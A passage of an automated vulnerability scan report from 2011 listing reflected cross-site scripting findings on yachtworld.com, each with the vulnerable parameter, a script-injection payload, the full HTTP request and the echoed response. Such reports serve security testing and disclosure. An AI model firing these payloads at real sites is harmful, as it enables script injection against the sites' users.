savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:37 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET ROWS="55,*">
<FRAME SRC="/scripts/return2yw.cgi?referer=" NAME="back" noscroll>
<FRAME SRC="http://www.starlingmarine.com9ac29"><script>alert(1)</script
...[SNIP]...
<A HREF="http://www.starlingmarine.com9ac29"><script>alert(1)</script>8837238e2e1">
...[SNIP]...

3.508. http://www.yachtworld.com/legendary/email.cgi [office_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/legendary/email.cgi

Issue detail

The value of the office_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 404b5"><script>alert(1)</script>1ff428848d9 was submitted in the office_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /legendary/email.cgi?url=legendary&office_id=75325404b5"><script>alert(1)</script>1ff428848d9&boat_id=2266476 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:44:24 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1



<html>
<head>
<TITLE>Legendary Marine (Destin, FL)</TITLE>
<META name="keywords" content="clas
...[SNIP]...
<INPUT TYPE="hidden" NAME="office_id" VALUE="75325404b5"><script>alert(1)</script>1ff428848d9">
...[SNIP]...

3.509. http://www.yachtworld.com/marinemaxcarolinas/email.cgi [office_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/marinemaxcarolinas/email.cgi

Issue detail

The value of the office_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b505"><script>alert(1)</script>a9943a9655e was submitted in the office_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marinemaxcarolinas/email.cgi?url=marinemaxcarolinas&office_id=353403b505"><script>alert(1)</script>a9943a9655e HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:47:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1



<html>
<head>
<TITLE>MarineMax Of The Carolinas (Wrightsville Beach, NC)</TITLE>
<META name="k
...[SNIP]...
<INPUT TYPE="hidden" NAME="office_id" VALUE="353403b505"><script>alert(1)</script>a9943a9655e">
...[SNIP]...

3.510. http://www.yachtworld.com/marinemaxcarolinas/marinemaxcarolinas_2.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/marinemaxcarolinas/marinemaxcarolinas_2.cgi

Issue detail

The value of the hosturl request parameter is copied into the HTML document as plain text between tags. The payload 1c98a<script>alert(1)</script>f8b5e352cd0 was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /marinemaxcarolinas/marinemaxcarolinas_2.cgi?company=marinemaxcarolinas&limit=50&type=&new=&units=Feet&hosturl=marinemaxcarolinas1c98a<script>alert(1)</script>f8b5e352cd0&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:47:19 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

 Exception while reading the file:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/marinemaxcarolinas1c98a<script>alert(1)</script>f8b5e352cd0/boats.header.html exception is java.io.FileNotFoundException: /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/marinemaxcarolinas1c98a<script>
...[SNIP]...

3.511. http://www.yachtworld.com/marinemaxcarolinas/marinemaxcarolinas_2.cgi [hosturl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/marinemaxcarolinas/marinemaxcarolinas_2.cgi

Issue detail

The value of the hosturl request parameter is copied into an HTML comment. The payload 1b6af--><script>alert(1)</script>3a8b21c180e was submitted in the hosturl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /marinemaxcarolinas/marinemaxcarolinas_2.cgi?company=marinemaxcarolinas&limit=50&type=&new=&units=Feet&hosturl=marinemaxcarolinas1b6af--><script>alert(1)</script>3a8b21c180e&page=broker HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:47:25 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<script>alert(1)</script>3a8b21c180e/boats.header.html:/opt/weblogic/waeyw/ywcluster/public_html/broker_pages/marinemaxcarolinas1b6af-->
...[SNIP]...

3.512. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp [currencyid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/cache/pl_search_results.jsp

Issue detail

The value of the currencyid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37b44"><script>alert(1)</script>01b74b349bb was submitted in the currencyid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privatelabel/listing/cache/pl_search_results.jsp?ps=50&slim=pp279757&uom=126&sm=3&duom=126&wuom=126&currencyid=10037b44"><script>alert(1)</script>01b74b349bb&luom=126&ps=50&searchPage=%2Flisting%2Fcache%2Fboats_for_sale_qs.jsp&so=2&slim=pp279757&currency=USD&units=Feet&currencyid=100& HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; 